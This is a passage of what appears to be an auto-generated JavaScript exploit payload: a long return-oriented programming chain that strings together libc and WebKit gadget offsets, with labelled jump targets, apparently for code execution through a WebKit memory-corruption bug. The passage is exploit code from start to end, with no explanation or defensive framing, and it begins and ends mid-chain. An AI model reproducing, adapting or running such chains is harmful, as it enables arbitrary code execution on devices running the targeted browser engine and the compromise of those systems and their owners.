libc_base+759608 //pop rax ]); //L11692: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11693: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L11694: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11695: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11696: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L11697: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+531856, //L11699 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11699: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+531912, //L11700 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11700: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+531992, //L11703 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11703: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+532048, //L11704 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11704: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+532184, //L11708 webkit_base+660161, 
//mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+532168, //L11707 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11706: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11707: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11708: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+532248, //L11709 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11709: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11711: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+532328, //L11712 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11712: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11713: db([8, 0]); // 0x8 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11714: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L11715: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+532512, //L11717 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11716: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11717: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al 
libc_base+764760, //pop rsi ropchain+532584, //L11718 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11718: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11720: db([4294967203, 4294967295]); // -0x5d set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L11722: db([4294967203, 4294967295]); // -0x5d set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+532744, //L11725 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+532728, //L11723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11723: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11725: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+532904, //L11729 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+532872, //L11727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+532888, //L11728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11726: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11727: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11728: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11729: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+532960, //L11731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11731: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+533088, //L11733 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+533104, //L11734 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+533072, //L11732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11732: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11733: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11734: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+533264, //L11738 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+533232, //L11736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+533248, //L11737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11735: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L11736: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11737: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11738: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+533320, //L11740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L11740: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+533448, //L11742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+533464, //L11743 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+533432, //L11741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11741: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11742: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11743: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+533576, //L11745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+533624, //L11748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+533592, //L11746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L11745: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11746: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11747: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11748: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+533736, //L11749+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+533728, //L11749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L11749: db([0, 0]); // 0x0 set_gadgets([ ropchain+533752, //L11749+24 ropchain+537832, //L11744 libc_base+764760, //pop rsi ropchain+533792, //L11750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11750: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11752: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+533912, //L11755 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+533896, //L11753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11753: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L11755: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+534088, //L11758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+534104, //L11759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+534056, //L11756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+534072, //L11757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11756: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11757: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11758: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11759: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+534200, //L11761 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+534184, //L11760 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11760: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11761: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+534280, //L11762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11762: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11764: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+534400, //L11767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+534384, //L11765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11765: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11767: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+534576, //L11770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+534592, //L11771 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+534544, //L11768 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+534560, //L11769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11768: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11769: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11770: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11771: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+534688, //L11773 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+534672, //L11772 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11772: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11773: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+534768, //L11774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11774: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11776: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+534888, //L11779 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+534872, //L11777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11777: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11779: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+535064, //L11782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+535080, //L11783 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+535032, //L11780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+535048, //L11781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11780: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11781: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11782: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11783: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+535176, //L11785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+535160, //L11784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11784: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11785: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+535272, //L11787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11786: 
db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11787: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11788: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+535392, //L11790 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+535376, //L11789 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11789: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11790: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11791: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11792: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+535560, //L11793 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11793: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11795: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+535680, //L11798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+535664, //L11796 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11796: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11798: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+535840, //L11802 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+535792, //L11799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+535808, //L11800 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11799: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11800: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11801: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L11802: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+535896, //L11803 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11803: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11805: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536016, //L11806 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+536032, //L11808 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11806: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11808: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+536176, //L11811 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536144, //L11809 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+536160, //L11810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11809: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11810: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L11811: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+536256, //L11812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11812: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11814: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+536376, //L11817 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536360, //L11815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11815: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11817: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+536520, //L11820 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536488, //L11818 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+536504, //L11819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11818: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11819: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11820: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+536600, //L11821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11821: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11823: db([4294967272, 4294967295]); 
// -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+536720, //L11826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536704, //L11824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11824: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11826: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+536864, //L11829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+536832, //L11827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+536848, //L11828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11827: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11828: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11829: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+536944, //L11830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11830: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11832: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+537064, //L11835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+537048, //L11833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11833: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11835: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, 
[rdi] libc_base+764760, //pop rsi ropchain+537208, //L11838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+537176, //L11836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+537192, //L11837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11836: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11838: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+537288, //L11839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11839: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11841: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+537408, //L11844 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+537392, //L11842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11842: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11844: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+537552, //L11847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+537520, //L11845 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+537536, //L11846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11845: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11846: db([0, 
